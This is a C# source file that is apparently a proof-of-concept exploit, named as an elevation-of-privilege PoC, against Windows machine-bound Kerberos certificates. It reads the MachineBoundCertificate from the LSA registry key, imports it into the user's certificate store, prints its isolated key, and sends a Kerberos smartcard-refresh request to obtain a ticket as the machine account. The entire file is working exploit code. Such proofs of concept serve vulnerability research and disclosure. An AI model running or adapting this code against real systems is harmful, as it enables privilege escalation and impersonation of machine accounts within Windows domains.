﻿using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Text;

namespace PoC_IumMachineCert_EoP
{
    internal class Program
    {
        private enum KERB_PROTOCOL_MESSAGE_TYPE
        {
            KerbRefreshSmartcardCredentialsMessage = 16,
        }

        private enum KERB_REFRESH_SCCRED_REQUEST_FLAGS
        {
            KERB_REFRESH_SCCRED_RELEASE = 0,
            KERB_REFRESH_SCCRED_GETTGT = 1,
        }

        [StructLayout(LayoutKind.Sequential)]
        private struct Luid
        {
            public uint LowPart;
            public int HighPart;
        }

        [StructLayout(LayoutKind.Sequential)]
        private struct UnicodeStringOut
        {
            public ushort Length;
            public ushort MaximumLength;
            public IntPtr Buffer;

            public UnicodeStringOut(IntPtr ptr, int length)
            {
                Buffer = ptr;
                Length = (ushort)length;
                MaximumLength = (ushort)(length + 2);
            }
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        private struct KERB_REFRESH_SCCRED_REQUEST
        {
            public KERB_PROTOCOL_MESSAGE_TYPE MessageType;
            public UnicodeStringOut CredentialBlob;
            public Luid LogonId;
            public KERB_REFRESH_SCCRED_REQUEST_FLAGS Flags;
        }

        [StructLayout(LayoutKind.Sequential)]
        private struct CERT_CREDENTIAL_INFO
        {
            public int cbSize;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 20)]
            public byte[] rgbHashOfCert;
        }

        private enum CredMarshalType
        {
            CertCredential = 1,
            UsernameTargetCredential,
            BinaryBlobCredential,
            UsernameForPackedCredentials,
            BinaryBlobForSystem
        }

        [return: MarshalAs(UnmanagedType.Bool)]
        [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        private static extern bool CredMarshalCredential(
            CredMarshalType CredType,
            ref CERT_CREDENTIAL_INFO Credential,
            out string MarshaledCredential // LPWSTR* 
        );

        static byte[] GetMachineCert()
        {
            using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters"))
            {
                if (key == null)
                    throw new ArgumentException("Error opening key.");
                byte[] cert = (byte[])key.GetValue("MachineBoundCertificate");
                if (cert == null)
                    throw new ArgumentException("Error querying cert.");
                return cert;
            }
        }

        const int CERT_STORE_ADD_ALWAYS = 4;

        [DllImport("Crypt32.dll", CharSet = CharSet.Unicode)]
        static extern bool CertAddSerializedElementToStore(
            IntPtr hCertStore,
            byte[] pbElement,
            int cbElement,
            int dwAddDisposition,
            int dwFlags,
            int dwContextTypeFlags,
            out int pdwContextType,
            out IntPtr ppvContext
        );

        [DllImport("Crypt32.dll", CharSet = CharSet.Unicode)]
        static extern bool CertGetCertificateContextProperty(
            IntPtr pCertContext,
            int dwPropId,
            [Out] byte[] pvData,
            ref int pcbData
        );

        const int CERT_ISOLATED_KEY_PROP_ID = 118;

        static byte[] GetIsolatedKey(IntPtr context)
        {
            int size = 0;
            CertGetCertificateContextProperty(context, CERT_ISOLATED_KEY_PROP_ID, null, ref size);
            byte[] data = new byte[size];
            if (!CertGetCertificateContextProperty(context, CERT_ISOLATED_KEY_PROP_ID, data, ref size))
                throw new ArgumentException("Cert doesn't have isolated key.");
            return data;
        }

        static string ProcessCert(byte[] cert)
        {
            using (X509Store store = new X509Store(StoreName.My, StoreLocation.CurrentUser))
            {
                store.Open(OpenFlags.ReadWrite);
                if (!CertAddSerializedElementToStore(store.StoreHandle, cert, cert.Length,
                    CERT_STORE_ADD_ALWAYS, 0, 2, out int type, out IntPtr pContext))
                {
                    throw new Win32Exception();
                }
                byte[] iso_key = GetIsolatedKey(pContext);
                Console.WriteLine(Convert.ToBase64String(iso_key));

                using (X509Certificate2 x = new X509Certificate2(pContext))
                {
                    return x.Subject;
                }
            }
        }

        static X509Certificate2 GetStoreCert(string subject)
        {
            using (X509Store store = new X509Store(StoreName.My, StoreLocation.CurrentUser))
            {
                store.Open(OpenFlags.ReadOnly);
                foreach (var cert in store.Certificates)
                {
                    if (cert.Subject == subject)
                    {
                        Console.WriteLine("Found cert.");
                        Console.WriteLine(GetIsolatedKey(cert.Handle).Length);
                        return cert;
                    }
                }
            }
            throw new ArgumentException("Couldn't find certificate.");
        }

        static void Authenticate(X509Certificate2 cert)
        {
            CERT_CREDENTIAL_INFO cred = new CERT_CREDENTIAL_INFO()
            {
                cbSize = Marshal.SizeOf(typeof(CERT_CREDENTIAL_INFO)),
                rgbHashOfCert = SHA1.Create().ComputeHash(cert.RawData)
            };

            if (!CredMarshalCredential(CredMarshalType.CertCredential, ref cred, out string marshaled))
            {
                throw new Win32Exception();
            }

            string upn = $"{marshaled}@{Environment.MachineName}$@{IPGlobalProperties.GetIPGlobalProperties().DomainName}";
            Console.WriteLine(upn);

            byte[] ba = Encoding.Unicode.GetBytes(upn);
            int struct_size = Marshal.SizeOf(typeof(KERB_REFRESH_SCCRED_REQUEST));
            int total_size = struct_size + ba.Length + 2;
            IntPtr ptr = Marshal.AllocHGlobal(total_size);
            IntPtr str_ofs = ptr + struct_size;
            KERB_REFRESH_SCCRED_REQUEST request = new KERB_REFRESH_SCCRED_REQUEST()
            {
                MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbRefreshSmartcardCredentialsMessage,
                Flags = KERB_REFRESH_SCCRED_REQUEST_FLAGS.KERB_REFRESH_SCCRED_GETTGT,
                CredentialBlob = new UnicodeStringOut(str_ofs, ba.Length)
            };
            Marshal.Copy(ba, 0, str_ofs, ba.Length);
            Marshal.StructureToPtr(request, ptr, false);

            using (var lsa = SafeLsaLogonHandle.ConnectUntrusted())
            {
                lsa.CallPackage("Kerberos", ptr, total_size);
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (Environment.Is64BitOperatingSystem && !Environment.Is64BitProcess)
                    throw new ArgumentException("POC must be compiled to run as 64-bit on a 64-bit OS.");

                Authenticate(GetStoreCert(ProcessCert(GetMachineCert())));
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message);
            }
        }
    }
}
